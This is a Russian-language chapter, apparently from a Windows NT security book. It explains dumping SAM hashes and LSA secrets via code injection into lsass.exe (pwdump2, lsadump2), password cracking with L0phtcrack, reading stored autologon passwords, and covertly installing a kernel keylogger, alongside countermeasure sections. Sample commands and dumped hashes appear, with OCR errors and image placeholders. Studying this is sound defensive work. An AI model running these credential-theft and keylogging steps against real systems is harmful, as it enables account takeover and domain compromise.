    Извлечение хэш-кодов из данных SAM



    При наличии привилегий администратора кэш-коды паролей можно легко получить непосредственно из системного реестра в формате, подобном формату файла /etc/passwd UNIX. Для этого можно воспользоваться утилитой pwdump, написанной Джереми Аллисоном (Jeremy Allison). Исходный код этой утилиты и ее откомпилированные версии для Windows можно найти в архивах Internet. Новые версии утилиты LOphtcrack также имеют подобное встроенное средство. Однако ни pwdump, ни LOphtcrack не способны преодолеть расширенное шифрование файла SAM с использованием ключа SYSKEY, появившееся после выпуска сервисного пакета Service Pack 2 (для получения более подробной информации читайте раздел "Контрмеры: Защита От Взлома Пароля" ниже в этой главе).
    Более поздняя версия утилиты pwdump, написанная Тоддом Сабином (Todd Sabin) и названная pwdump2 (http://razor.bindview.com/tools/desc/pwdump2_readme.html), может обойти SYSKEY-защиту. Работа pwdump2 основана на внедрении библиотеки DLL (см. выше описание утилиты getadmin), посредством чего она записывает свой код в пространство другого процесса, обладающего более высоким уровнем привилегий. После этого внедренный код вызывает внутренние функции интерфейса API, с помощью которых утилита получает доступ к зашифрованным паролям, минуя необходимость их расшифровки.
    В отличие от pwdump утилита pwdump2 должна запускаться в пространстве процессов взламываемой системы. Причем в данном случае по-прежнему требуется процесс с привилегиями администратора, а также библиотека samdump.DLL (которая распространяется вместе с pwdump2).
    Привилегированный процесс, используемый утилитой pwdump2,— это процесс lsass.exe подсистемы защиты (Local Security Authority Subsystem — LSASS). Утилита внедряет свой код в адресное пространство и пользовательский контекст процесса lsass.exe. Однако перед запуском утилиты необходимо вручную получить идентификатор процесса (PID — Process ID).

    Тодд Сабин написал обновленную версию утилиты pwdump2, после установки которой идентификатор РЮ процесса LSASS можно получить автоматически. Поэтому пользователям обновленной версии выполнять этот шаг вручную не требуется. Однако сейчас мы сосредоточимся на обсуждении основной концепции получения идентификаторов процессов, которую потребуется использовать в тех случаях, когда обновленная версия утилиты pwdump2 отсутствует.

    Воспользуемся утилитой pulist из NTRK и, объединив ее с утилитой find, получим идентификатор процесса lsass.exe, как показано в следующем примере.

    D:\>pulist | find "lsass"
    lsass.exe 50 NT AUTHORITYXSYSTEM

    Теперь можно запустить утилиту pwdump2, передав ей в качестве параметра полученный идентификатор PID 50. По умолчанию результаты выводятся на экран (в приведенном выше примере они показаны в сокращенной форме), однако их легко перенаправить в файл. Пом-
    ните, что pwdump2 должна выполняться локально на удаленной системе. В противном случае вы получите дамп собственных паролей! Обсуждение методов удаленного запуска программ содержится ниже в разделе "Удаленное Управление И Потайные Ходы" данной главы.

    D:\>pwdump2 50
    A. Nonymous:1039:e52cac67419a9a22
    4a3bl08f3fa6cb6d:8846f7eaee8fbll7..
    ACMEPDC1$:1000: 922bb2aaaObc07334d9al
    60a08db3a33 : d2ad2ce86a7d90f d62..
    Administrator: 500:48b48ef 5635d97b6f 513f
    7c84b50c317 : 8a6a398a2d8c84f..
    Guest:501:aOel50c75al7008eaad3b435b51404ee:
    823893adfad2cda6ela414f..
    IUSR_ACMEPDC1:1001:cabf272ad9e04b24af3
    f5fe8cOf 05078:e6f 37a4 69ca3f8..
    IWAM_ACMEPDC1: 1038:3d5c22dObal7f25c2eb
    8a6e701182677:d96bf5d98ec992..

    Из данного примера видно, что выводятся такие поля, как имя пользователя, относительный идентификатор RID (см. главу 3), хэш-код LanMan и кэш-код NT I последний выведен только частично). Все поля отделяются друг от друга двоеточием. Направив вывод в файл, можно получить готовые исходные данные для многих средств взлома паролей системы NT.

    Самая последняя версия утилиты pwdump2 позволяет также извлекать хэш-коды из базы данных активного каталога.

    Перехват данных о пользовательских именах и паролях, передаваемых по сети



    Одной из сильных сторон утилиты LOphtcrack является возможность извлекать \эш-коды паролей прямо из SMB-пакетов, передаваемых по сети. Этот подход уже рассматривался в одном из предыдущих разделов, посвященных подбору паролей.
    Поскольку утилита LOphtcrack способна выполнить большую часть из описанных выше задач, давайте перейдем к обсуждению подробностей того, как это осуществить.

    Взлом паролей NT



    В данном разделе вы познакомитесь с тремя утилитами, предназначенными для взлома паролей системы NT. Хотя наиболее известной является утилита L0phtcrack, здесь мы рассмотрим и некоторые другие средства.

    L0phtcrack



    Версию утилиты L0phtcrack с графическим интерфейсом, распространяемую исследовательской лабораторией компании ©stake по цене S100, можно найти по адресу http://www.atstake.com. Для сохранения душевного покоя системного администратора это совсем недорого. Во время написания этой книги была выпущена бета-версия 3 утилиты L0phtcrack — первое существенное обновление программы за последние два года.
    Как уже упоминалось, утилита L0phtcrack может импортировать данные SAM из нескольких источников: из самого файла SAM, из его резервной копии SAM._, с удаленного компьютера (используя привилегии администратора и встроенную функцию, работающую по принципу утилиты pwdump), а также непосредственно из потока данных, передаваемых по сети. Ниже показано простое диалоговое окно утилиты, используемой для получения хэш-кодов паролей. Как видно из рисунка, требуется просто ввести IP-адрес взламываемой системы.
    Еще раз обращаем ваше внимание на то, что встроенная утилита последней (на момент написания данной книги) версии L0phtcrack не обладает возможностью взлома расширенного SYSKEY-шифрования базы данных SAM (см. ниже раздел "Шифрование Syskey"). Поэтому, если на взламываемой системе используется SYSKEY-шифрование, необходимо пользоваться описанной выше утилитой pwd'jzr\p2.
    Затем с помощью команды File>Open Wordlist File нужно указать используемый файл словаря (обширный словарь, содержащий часто употребляемые в качестве пароля слова английского языка, распространяется вместе с утилитой). И наконец, с помощью команды Tools>Options нужно установить некоторые параметры. Для взлома пароля путем перебора необходимо установить флажок Enabled, находящийся в группе параметров Brute Force Attack диалогового окна Tools Options. Затем нужно выбрать предполагаемый набор символов, из которого будут генерироваться пароли (чем больше набор, тем дольше придется перебирать все возможные комбинации). Утилита L0phtcrack сначала попытается подобрать пароль с помощью словаря и лишь после этого перейдет к перебору всех возможных вариантов. Прерванный сеанс подбора пароля можно продолжить позже с того же места, в котором произошла остановка. Поэтому в общем случае вопрос продолжительности работы не является критичным. Поддерживается также компромиссный режим Dictionary/Brute Hybrid, при использовании которого метод подбора пароля из словаря объединяется с перебором всех возможных вариантов. Действительно, учитывая, что многие пользователи выбирают пароли вида password!23, не утруждая себя задачей запоминания сложного пароля, имеет смысл попробовать применить в качестве пароля слова, содержащиеся в словаре, с добавлением к ним заданного количества символов. Пример выбора параметров в окне Tools Options показан на следующем рисунке.
    Теперь просто выберите команду Tools>Run Crack, и утилита L0phtcrack возьмется за дело. В файле SAM, полученном из большого домена NT, практически всегда удается обнаружить нулевой пароль или слова из словаря (рис. 5.6). Кроме того, из данного рисунка видно, с какой легкостью угадываются пароли LanMan, что делает более надежную защиту с помощью алгоритма хэширования NT неэффективной. Даже в тех случаях, когда некоторые пароли остаются неразгаданными (как, например, пароль пользователя Malta), алгоритм LanMan позволяет узнать два последних символа таких паролей. Этого вполне достаточно, чтобы в течение суток подобрать остальные 7 символов, при условии, что пароль состоит лишь из букв и цифр.


    Текущее состояние процесса подбора пароля можно в любой момент сохранить в файле с расширением .1с. Поэтому работа утилиты L0phtcrack может быть безболезненно прекращена, а затем возобновлена с того же места с помощью команды File>Open Password File.
    Утилита L0phtcrack с графическим пользовательским интерфейсом является лучшим средством взлома файла паролей системы NT из всех имеющихся на рынке как по скорости работы, так и по простоте использования. Однако имеется и один недостаток: наличие графического интерфейса не позволяет использовать эту утилиту в сценариях и командных файлах. Для применения в командной строке на Web-узле http://www.atstake.com можно найти лишь устаревшую версию 1.5 (lc_cli.exe), которая распространяется вместе с исходным кодом. Так что, если говорить об утилитах взлома паролей, использующих интерфейс командной строки, лучше обратить внимание на продукты других разработчиков.




    Рис. 5.6. Утилита L0phtcrack за работой. Менее надежные пароли LanMan взломать гораздо легче, что делает ненужным подбор хорошо защищенных паролей NT

    John-потрошитель



    John — это программа взлома паролей с использованием словаря. Ее можно получить по адресу http://www.false.com. Первоначально эта утилита командной строки была создана для взлома файлов паролей системы UNIX, а теперь ее можно использовать для подбора хэш-кодов LanMan системы Windows NT. Помимо того, что John совместима с несколькими платформами и позволяет применять несколько разных алгоритмов шифрования, эта утилита отличается также высокой скоростью работы и тем, что распространяется бесплатно. С другой стороны, ее широкие возможности и, соответственно, большой набор параметров командной строки, делают эту утилиту более сложной в освоении, чем L0phtcrack. Кроме того, поскольку утилита John может взламывать лишь пароли LanMan, то полученные результаты необходимо проверять на соответствие прописных и строчных букв (пароли LanMan всегда переводятся в верхний регистр, тогда как в паролях NT используются как прописные, так и строчные буквы).

    Crack 5 с расширением для NT



    Утилита crack, написанная Алеком Маффетом (Alec Muffet), изначально предназначалась для взлома файлов паролей системы UNIX. Однако со временем для нее было создано расширение, которое позволило использовать эту утилиту и для взлома паролей NT (http://www.sun.rhbnc.ac.uk/~phacl07/c50a-nt-0.20.tgz). Самое большое преимущество использования утилиты crack состоит в очень широком разнообразии проверяемых ею вариаций возможных паролей (включая более 200 вариантов, основанных на имени пользователя). Однако все преимущества утилиты crack будут сведены на нет, если у вас отсутствует опыт работы в системе UNIX, необходимый для ее установки и запуска.

    Контрмеры: защита от взлома пароля



    Строгие правила выбора пароля



    Никакие технические средства не смогут обеспечить гарантированную защиту от взлома пароля. Они необходимы для создания эффективной защиты, но одних лишь технических средств недостаточно. Самым эффективным и вместе с тем трудно реализуемым средством был и остается правильный выбор пароля. Пользователи, выбирающие легко угадываемые пароли или записывающие их на обратной стороне клавиатуры, по-видимому, еще долго будут оставаться источником головной боли администраторов. Надеемся, что приведенное ниже описание некоторых скрытых недостатков, имеющихся в алгоритмах защиты паролей NT, сможет помочь вам в разъяснении пользователям необходимости строгого соблюдения ваших требований.
    Как мы уже неоднократно упоминали, в системе NT применяется два разных алгоритма шифрования пользовательских паролей: совместимый с LanManager (LMH — LanManager Hash) и созданный специально для NT (NTH — NT Hash) . Оба представления зашифрованного с помощью этих алгоритмов пароля хранятся в базе данных SAM. Как уже упоминалось, значение LMH вычисляется с помощью алгоритма, имеющего внутренние недостатки (в данном случае не стоит ругать Microsoft — алгоритм LanManager изначально был разработан компанией IBM).
    Самым большим недостатком алгоритма LMH является разделение пароля на две части, каждая из которых состоит из семи символов. Другими словами, пароль, имеющий длину 8 символов разделяется на два пароля, первый из которых состоит из 7 символов, а второй — из 1 символа. Подобные утилите L0phtcrack средства используют этот недостаток, проверяя одновременно обе половины пароля именно так, как если бы они были независимыми друг от друга паролями. Рассмотрим, например, 12-символьный пароль, который полностью соответствует требованиям библиотеки Passfilt — l23456Qwerty. Во-первых, когда пароль шифруется по алгоритму LM, его символы преобразуются в верхний регистр— 123456QWERTY. Затем к паролю добавляются нулевые символы (т.е. символы с кодом 0, чтобы получить строку, состоящую из 14 символов): 123456QWERTY_. Перед шифрованием эта строка делится на две части — 123456Q и WERTY_. После этого каждая строка шифруется независимо от другой, а полученные результаты объединяются. Зашифрованное значение ДЛЯ 123456Q — 6BF11E04AFAB197F, а ДЛЯ WERTY_— 1E9FFDCC75-575В15. Таким образом, полученный в результате хэш-код будет иметь следующее значение: 6BF11E04AFAB197F1E9FFDCC75575B15.
    Поскольку первая половина пароля, представленного хэш-кодом, содержит и буквы, и цифры, то на ее взлом путем перебора всех возможных вариантов с помощью утилиты L0phtcrack уйдут сутки или около того, в зависимости от вычислительной мощности используемого компьютера. Однако вторая половина пароля содержит только символы, поэтому на ее взлом понадобится всего лишь 60 секунд при использовании компьютера с процессором Pentium. На рис. 5.7 показано, как за считанные секунды с использованием утилиты L0phtcrack была взломана вторая половина пароля пользователя waldo (полный пароль —строка 123456qwerty).
    Каждая взломанная половина пароля отображается в соответствующей строке окна утилиты LOphtcrack. В рассматриваемом примере была идентифицирована вторая половина пароля пользователя waldo. Теперь можно сделать некоторые предположения о том, какой может быть первая половина пароля. Строка WERTY говорит о том, что в качестве пароля пользователь выбрал символы из верхнего ряда клавиш клавиатуры. Следовательно, имеет смысл проверить такие пароли, как QWERTYQWERTY, POIUYTQWERTY, ASDFGHQWERTY, YTREWQQWERTY И, наконец, 123456QWERTY. Эти варианты можно добавить в словарь, подготовленный для утилиты LOphtcrack, а затем приступить к очередному штурму. Менее чем через 5 секунд в окне LOphtcrack появляются и пароль LanMan, и пароль NT, как показано на рис. 5.8.



    Рис. 5.7. Утилита L0phtcrack взломала половину пароля пользователя waldo менее чем за минуту на компьютере с процессором Pentium



    Рис. 5.8. Утилита L0phtcrack с помощью обновленного словаря справилась с подбором правильного пароля за считанные секунды

    Данный пример наглядно демонстрирует, как относительно просто угадать казалось бы довольно сложный пароль LMH, зная его вторую половину. Таким образом, мы получаем парадокс: при данном подходе 12- и 13-символьные пароли могут оказаться менее надежными, чем 7-символьные, так как взломщик, зная вторую половину длинного пароля, может догадаться о том, из каких символов состоит первая половина, как это было показано в рассмотренном примере. Пароль, состоящий из восьми символов, вряд ли даст взломщику много информации, однако он, пусть только теоретически, не столь надежен, как 7-символьный пароль.
    Для снижения вероятности успешного взлома выбирайте пароли в точности длиной 7 или 14 символов. (Не забывайте, что длинные 14-символьные пароли пользователи, скорее всего, будут записывать и держать эти записи под рукой. Поэтому предпочтительнее использовать 7-символьные пароли.)
    Если же вы хотите поставить в тупик взломщика, вооруженного утилитой L0phtcrack, используйте в каждой половине пароля хотя бы один управляющий символ ASCII. Такие символы (например, символы с кодом 255 или 129) не отображаются на экране утилитой L0phtcrack. Конечно, ежедневный ввод таких паролей, требующих дополнительных нажатий клавиш для ввода символа по его коду (<Аlt>+код символа на цифровой вспомогательной клавиатуре в режиме <NumLock>), связан с некоторым неудобством и, по-видимому, будет использоваться только профессиональными пользователями, имеющими широкие полномочия по администрированию рабочих групп и учетных записей обычных пользователей. Что касается администраторов, то для них использование в паролях как можно большего количества неотображаемых символов должно стать обыденной практикой.
    Наконец, не забывайте о необходимости установить с помощью библиотеки Passfilt минимальную длину пароля, как это описано в приведенном выше разделе "Контрмеры: Защита От Подбора Пароля".

    Защита базы данных SAM



    Ограничение доступа к файлу SAM — это также один из важнейших методов зашиты. Физическое ограничение доступа к серверу является единственным методом воспрепятствовать злоумышленнику скопировать файл SAM, загрузившись с дискеты, или скопировать резервную копию этого файла из папки Repair. Надеемся, что о том, чтобы контролировать все случаи регистрации на сервере под именем Administrator, напоминать не нужно.

    Шифрование SYSKEY



    Расширенное SYSKEY-шифрование данных SAM было разработано вскоре после выхода сервисного пакета Service Pack 2. Такой алгоритм позволяет установить шифрование паролей с помощью 128-битового ключа (по умолчанию используется 40-битовый ключ). Для включения режима шифрования необходимо выбрать команду Starts Run и ввести в поле ввода появившегося диалогового окна Run команду syskey. Режим шифрования SYSKEY можно настроить с использованием нескольких основных параметров, как показано на следующих двух рисунках.


    При включении режима SYSKEY ключ шифрования паролей, в свою очередь, кодируется с помощью системного ключа, который может храниться как локально (защищенный паролем), так и на гибком диске. Если вы чрезвычайно обеспокоены обеспечением безопасности, выберите второй вариант, но учтите при этом, что в большой сети это потребует дополнительных затрат на сохранение всех ключей на гибких дисках. Кроме того, как мы увидим несколько позже, существуют средства, позволяющие обойти и режим шифрования SYSKEY. Однако даже небольшой барьер, оказавшийся на пути взломщика, повышает безопасность сети. По крайней мере злоумышленнику придется хорошо потрудиться, чтобы взломать пароли.

    Группа исследователей RAZOR обнаружила изъян в реализации алгоритма шифрования SYSKEY, описание которого можно найти по адресу http://razor.-bindvi6w.com/publish/advisories/adv_WinNT_syskey.htinl. Если вы решили воспользоваться этим алгоритмом, то установите также модуль обновления, который можно получить по адресу http://wvw.microsoft.com/teohnet/ security/bulletin/ms99-056.asp.

    Если взломщики имеют безнадзорный физический доступ к компьютеру с системой NT/2000, то они без проблем могут загрузиться с использованием другой операционной системы и аннулировать пароль учетной записи администратора, удалив файл SAM, либо добавить пароль для любой имеющейся учетной записи. Этот прием позволяет полностью обойти алгоритм шифрования SYSKEY. Лишь при использовании режима защиты с использованием пароля или при хранении системного ключа на гибком диске можно несколько повысить уровень защиты. Более подробная информация по этому вопросу содержится в разделе главы 6, который посвящен утилите chntpw.

    Аудит доступа к базе данных SAM



    Зачастую бывает довольно трудно выявить факт извлечения информации о паролях с вашего узла NT. Одной из возможностей, призванных помочь в решении этой проблемы, является аудит системы NT, обеспечивающий наблюдение за доступом к параметрам реестра, связанных с SAM. Однако на практике это средство мало что может сделать, поскольку к этим параметрам имеют доступ очень многие служебные процессы (например, диспетчер пользователей). Но несмотря на то, что само по себе решение не очень хорошее, некоторые технические аспекты настройки контроля доступа к SAM заслуживают внимания.
    Прежде всего, убедитесь, что в диспетчере пользователей установлен флажок Success для событий File and Object Access (Policies^Audit). Затем нужно включить режим контроля доступа к определенным параметрам системного реестра. К сожалению, параметры, которые необходимо контролировать, недоступны ни простому пользователю, ни даже администратору. Для обхода данного ограничения нужно открыть окно редактора системного реестра, воспользовавшись контекстом учетной записи Local System.
    Запустите агигст Services панели управления, а затем в появившемся диалоговом окне выберите службу Schedule (на рабочей станции — Task Scheduler). Щелкните на кнопке Startup и в открывшемся окне свойств установите режим System Account, а также Флажок Allow Service to Interact with Desktop. Затем введите в командной строке следующую ком;нпу soon regedt32 /I
    Утилита soon, входящая в состав NTRK, предназначена для взаимодействия с командой AT и запуска той или иной программы в текущий момент. Параметр , : npri писывает запускаемой программе (в данном случае редактору системного peecn.w), выполняться в интерактивном режиме.
    Сразу же после выполнения команды будет открыто окно редактора системного реестра. Однако на этот раз параметры SAM и Security станут доступными обычному пользователю. Будьте очень осторожны при работе с этими параметрами — даже минимальные изменения могут нарушить нормальное функционирование операционной системы вашего компьютера.' Найдите параметр HKLM/Security/SAM/Domains/Account/Users и щелкните на нем, а затем выберите из меню команду Security ^Auditing. Установите параметр Audit Permissions on Existing Subkeys, а затем щелкните на кнопке Add и добавьте учетную запись SYSTEM. Наконец, для события Query Value установите режим Success, a затем щелкните на кнопке ОК. Выйдите из редактора системного реестра и убедитесь в том, что служба Schedule отключена. Теперь можно контролировать доступ к параметрам реестра, осуществляемый, например, с помощью утилиты pwdump.
    Вскоре журнал безопасности будет заполнен сообщениями с идентификаторами 560 и 562, которые связаны с обращением к параметрам SAM. При аудите сложнее всего выбрать среди многочисленных записей те. которые связаны с получением информации о диспетчере SAM с помощью различных утилит семейства pwdump, поскольку с точки зрения системы между такими событиями и событиями, связанными с легитимным доступом к параметрам SAM, нет никакой разницы. Кроме того, журнал, в который будут заносится все соответствующие операции, очень быстро достигнет чудовищных размеров, а регистрация событий повлечет за собой дополнительный расход ресурсов. Более эффективный метод решения данной проблемы, по-видимому, состоит в отслеживании вызовов утилиты pwdump на уровне интерфейса API. Однако пока данная задача не реализована на практике, контроль доступа к параметрам SAM остается хоть и низкоэффективным, но все же единственным средством.


    12.gif

    Изображение: 

    13.gif

    Изображение: 

    14.gif

    Изображение: 

    15.gif

    Изображение: 

    16.gif

    Изображение: 

    17.gif

    Изображение: 

    8. Использование доверительных отношений



    Использование доверительных отношений


    Для того чтобы "получить в свое распоряжение" домен, недостаточно обладать правами администратора на одном из компьютеров сети. Фактически в больших сетях многие серверы NT являются независимыми серверами приложений (т.е. компьютерами, которые используются конечными пользователями, но работающие под управлением операционной системы Windows NT Server, а не NT Workstation), а не контроллерами доменов, на которых хранятся копии базы данных SAM домена. Однако в распоряжении взломщика имеется несколько способов получения информации от автономного сервера, на основании которой можно получить доступ ко всему домену.

    Дублирование данных учетных записей администраторов домена и локальной системы



    Самым простым методом проникновения является использование довольно распространенной порочной практики администрирования, заключающейся в хранении данных о пользователях домена на отдельных компьютерах, работающих под управлением NT Server или Workstation. В идеальной ситуации никто не должен обладать правом регистрации на рабочей станции NT как Local Administrator с тем же паролем, что и Domain Admin. To же самое относится и к созданию локальной учетной записи с теми же пользовательским именем и паролем, которые используются в учетной записи на уровне домена. Однако в реальности такая практика является, скорее, правилом, а не исключением. Подобный один-единственный изъян в системе защиты может привести к созданию "лазеек" для проникновения в домен NT, с чем нам не раз приходилось сталкиваться при тестировании различных сетей.
    Например, допустим, что разозлившийся на руководство служащий обнаружил в домене тестовый сервер, позволяющий зарегистрироваться на нем в качестве локального администратора с пустым паролем. Сам по себе этот факт еще ничего не означает, поскольку пользователь не сможет получить доступ к домену, потому что привилегии локальной учетной записи не распространяются на домен. Однако если администратор этого тестового сервера создал на нем учетную запись, которая дублирует его учетную запись на уровне домена (как правило, это делается для того, чтобы упростить доступ к ресурсам домена, необходимым для тестирования), взломщик без каких-либо проблем получит дамп SAM из реестра, как было показано в предыдущем разделе, и взломает пароль администратора домена. После этого он без труда зарегистрируется на контроллере домена с привилегиями системного администратора — и все это, лишь воспользовавшись данными учетной записи Domain Admin.
    К сожалению, такие ситуации встречаются гораздо чаще, чем хотелось бы. Чтобы исправить положение, необходимо проверить, не имеют ли место в вашей сети следующие факты.

    •  Пароли локальных учетных записей Administrator совпадают с паролями членов группы Domain Admins.
    •  Пароли и пользовательские имена локальных учетных записей совпадают с паролями и пользовательскими именами учетных записей домена (особенное внимание необходимо уделить учетным записям, которые входят в группу Domain Admins).
    •  В полях комментария указана информация, которая может послужить подсказкой для получения данных о пароле домена, например: "Пароль такой же, как и у администратора на SERVER1".

    Контрмеры против дублирования данных учетных записей



    Самой лучшей защитой от таких "подводных камней" является использование сложных паролей для всех учетных записей группы администраторов домена и их последующее регулярное изменение (не реже, чем один раз в месяц). Кроме того, пользовательские учетные записи не должны использоваться для выполнения административных функций. Если в этом есть необходимость, создайте для таких пользователей специальные учетные записи и установите режим их аудита. Например, вместо того чтобы вносить учетную запись jsmith в группу Domain Admins, создайте учетную запись jsmitha с соответствующим уровнем привилегий. (Обратите внимание, что не стоит создавать учетные записи вида isadmin, поскольку они сразу же привлекут внимание взломщика.)
    Еще одним хорошим практическим методом является использование NT-варианта утилиты UNIX su (из набора NTRK) для запуска команд с привилегиями другого пользователя.

    Встроенная команда runae Windows 2000 предоставляет более простой способ запуска приложений с необходимыми привилегиями. Например, следующая команда runas запускает сеанс командной оболочки, работающий в контексте учетной записи Administrator домена DOMAIN2.

    runas /user:domain2\administrator cmd.exe

    Атака на секреты LSA



    Эта атака может послужить одним из самых ярких примеров той опасности, к которой может привести хранение регистрационных данных в незашифрованном виде. Такая информация вместе с некоторыми другими важными данными хранится системой NT во многих местах. Процесс получения конфиденциальной информации носит название атаки на секреты подсистемы защиты LSA (Local Security Authority). Эту информация определяется параметром системного реестра HKEY_LOCAL_MACHINE\-SECURITY\Policy\Secrets. К секретам LSA относятся следующие данные.

    •  Пароли учетных записей служб (хранятся в виде незашифрованного текста). Специальные учетные записи требуются приложениям, которым необходимо зарегистрироваться в контексте локального пользователя для выполнения определенных задач, например резервного копирования. Такие учетные записи обычно имеются во внешних доменах и при взломе какого-либо компьютера могут использоваться взломщиком для прямой регистрации во внешнем домене.
    •  Кэшированные хэш-коды паролей последних десяти регистрировавшихся пользователей.
    •  Пароли FTP и Web (также в виде незашифрованного текста).
    •  Имена и пароли учетных записей служб RAS. 
    •  Пароли рабочих станций для доступа к домену.

    Очевидно, что такие сведения, как пароли учетных записей служб, запушенных с привилегиями пользователей домена, информация о последних регистрировавшихся пользователях, пароли доступа рабочих станций к домену и так далее могут оказать взломщику существенную помощь в исследовании структуры домена.
    Например, представим автономный сервер, на котором запущены службы SMS (Systems Management Server) или SQL, работающие в контексте пользователя домена. Если локальный администратор такого сервера использует пустой пароль, то с помощью данных LSA взломщик может получить сведения об учетной записи пользователя домена. Этот изъян может привести к утечке информации на уровне многорангового домена (multimaster domain). Если на сервере ресурсов домена запущена служба, работающая в контексте учетной записи пользователя главного домена, то утечка информации на уровне сервера ресурсов может обеспечить злоумышленнику доступ к главному домену.
    Можно привести и более опасный пример, который довольно типичен для корпоративных пользователей портативных компьютеров. Допустим, сотрудник компании захватил с собой в поездку такой компьютер, чтобы с помощью службы удаленного доступа подключаться к корпоративной сети или к провайдеру Internet. Поскольку он не новичок в вопросах безопасности, он не устанавливает флажок, включающий режим сохранения паролей учетных записей удаленного доступа. Но, к сожалению, система NT все равно глубоко в недрах системного реестра сохраняет пользовательское имя, номер телефона и пароль.
    Исходный код, позволяющий получить секреты LSA, в 1997 году был опубликован в бюллетене NTBugtraq (http://www.ntbugtraq.com) Полом Эштоном (Paul Ashton). Однако сгенерированный исполняемый код не получил широкого распространения. Обновленную версию этого кода, называемую Isadump2, можно найти по адресу http://razor.bindview.com/tools/desc/lsadump2_readme.html. Утилита Isadump2 использует тот же прием, что и утилита pwdump2. Это позволяет обойти средства защиты компании Microsoft (см. ниже), которые ранее не позволяли успешно применять предыдущую версию этого средства, Isadump. Утилита Isadump2 выполняет автоматический поиск идентификатора PID процесса LSASS, внедряет себя в его поток управления и извлекает секреты LSA, как показано в следующем примере.

    D:\Toolbox>lsadump2 $MACHINE.ACC
    6E 00 76 00 76 00 68 00 68 00 5A 00 30 00 41 00
    n.v.v.h.h.Z.0.A.
    66 00 68 00 50 00 6C 00 41 00 73 00 f.h.P.l.A.s.
    _SC_MSSQLServer
    32 00 6D 00 71 00 30 00 71 00 71 00 31 00 61 00
    .p.a.s.s.w.о.г.d.
    _SC_SQLServerAgent
    32 00 6D 00 71 00 30 00 71 00 71 00 31 00 61 00
    p.a.s.s.w.о.г.d.

    Как видно из приведенного фрагмента, в полученных данных содержится пароль учетной записи домена, а также два пароля, связанных с учетными записями службы SQL, которые извлечены из данных LSA.
    В программе Internet Scanner 5.6 от компании Internet Security Systems (ISS) встроена возможность инвентаризации секретов LSA, которая входит как составная часть в технологию SmartScan. Если этот сканер сможет получить доступ к узлу NT на уровне администратора, он попытается инвентаризовать все возможные пароли, которые когда-либо использовались на данном узле. Все найденные пары "имя учетной записи/пароль" сохраняются в файле KnownUsers. В тех случаях, когда сканер обнаруживает (через нулевое соединение) в сети другой узел, на котором имеется учетная запись с таким же именем, он пытается подключиться к нему, указав только что найденный пароль. Не нужно обладать большим воображением, чтобы понять, насколько быстро можно собрать важнейшую информацию о всех или почти всех учетных записях большой сети.

    Контрмеры: защита секретовLSA



    К сожалению, компания Microsoft не сказала ничего оригинального, заявляя, что к подобной информации администратор имеет доступ в соответствии с принятой архитектурой. В статье базы знаний KB Q184017 описывается модуль обновления, предназначенный для исправления изъянов исходной версии подсистемы LSA. После его установки с помощью шифрования SYSKEY кодируются хранящиеся на компьютере пароли учетных записей служб, кэшируемые данные для регистрации в домене, а также пароли рабочей станции.
    Изъян, заключающийся в открытом хранении кэшируемых данных RAS, был исправлен в сервисном пакете SP6a (изначально после появления сервисного пакета SP5 компанией Microsoft был выпущен модуль обновления). Более подробная информация приведена в статье KB Q230681.

    Параметры реестра, предназначенные для автоматической регистрации



    Систему NT можно настроить таким образом, чтобы при загрузке выполнялась автоматическая регистрация в системе. Для этого используется параметр системного реестра HKLM\SOFWTARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon. Автоматическая регистрация может оказаться полезной в тех редких случаях, когда неже-
    лательно, чтобы пользователь знал регистрационное имя и пароль. Однако необходимо знать, что в этом режиме в реестре (группа параметров HKLM\SOFWTARE\Microsoft\ Windows NT\CurrentVersion\Winlogon\) сохраняются в незашифрованном виде такие сведения, как используемые по умолчанию имя домена (DefaultDomainName), пользовательское имя (DefaultUserName) и пароль (DefaultPassword).
    Остерегайтесь также применения процедур автоматической установки программного обеспечения, которым после перезагрузки требуется автоматическая регистрация с привилегиями администратора.

    Контрмеры против автоматической регистрации



    Для того чтобы запретить автоматическую регистрацию, удалите значение параметра DefaultPassword. Кроме того, нужно удалить значение параметра AutoAdmin Logon или установить его равным 0.

    Регистраторы нажатия клавиш



    Если все остальные попытки взломщика, имеющего статус администратора локальной системы, получить аналогичные привилегии в домене не увенчались успехом, он может попытаться пойти самым простым путем: установить регистратор нажатия клавиш (keystroke logger). Так называются программы, которые скрытно от пользователя перехватывают все нажатия клавиш и, прежде чем передать их операционной системе, записывают в скрытый файл на диске. Рано или поздно какой-нибудь пользователь, зарегистрировавшись в системе, оставит соответствующий "отпечаток" своего имени и пароля в файле программы-регистратора.
    Существует множество различных регистраторов для Windows NT, однако, пожалуй, одним из лучших является Invisible Key Logger Stealth (IKS) for NT, который можно найти на узле http: //www.amecisco.com/iksnt.htm по цене $149.
    IKS for NT — это, по сути дела, драйвер клавиатуры, который работает внутри ядра NT. Именно этим и объясняется то, что его присутствие практически никак не отображается в системе. IKS перехватывает даже нажатие комбинации клавиш <Ctrl+Alt+Del>, что позволяет очень легко идентифицировать каждый факт регистрации в системе.
    Однако еще важнее то, что очень просто осуществить удаленную установку IKS. Для этого достаточно скопировать один файл, отредактировать некоторые параметры реестра, а затем перезагрузиться. Злоумышленник, скорее всего, переименует драйвер iks.sys, присвоив ему какое-то имя, не вызывающее подозрений, например scsi.sys (у кого поднимется рука, чтобы удалить такой драйвер?), а затем скопирует его в каталог %systemroot%\system32\drivers. После этого остается лишь внести изменения в системный реестр в соответствии с содержимым файла iks.reg, входящего в комплект поставки, или просто запустить на удаленном компьютере файл .reg. Можно воспользоваться также программой regini.exe, входящей в состав NTRK, которая может внести изменения в реестр удаленного узла. В файле readme.txt, который входит в комплект поставки IKS, объясняется, как скрыть драйвер и файл журнала с перехваченными нажатиями клавиш, изменив содержимое файла .reg. После внесения изменений в реестр необходимо перезагрузить систему, чтобы драйвер IKS приступил к работе. Для выполнения этой задачи проще всего воспользоваться инструментом Remote Shutdown из NTRK (shutdown. exe), как показано в следующем примере (подробное описание параметров командной строки содержится в документации по NTRK). shutdown \\<±р_адрес> /R /T:l /Y /С
    Если все пройдет гладко и никто не обратит внимания на странное поведение компьютера-жертвы, то все нажатия клавиш будут сохраняться в файле, указанном в последней строке файла iks . reg. Выждав какое-то время, взломщик снова зарегистрируется в качестве администратора, перепишет полученный файл (по умолчанию он называется iks.dat, но, скорее всего, он будет переименован), а затем просматривает его с помощью утилиты datview, входящей в комплект поставки IKS. Ниже приведено диалоговое окно настройки параметров datview.


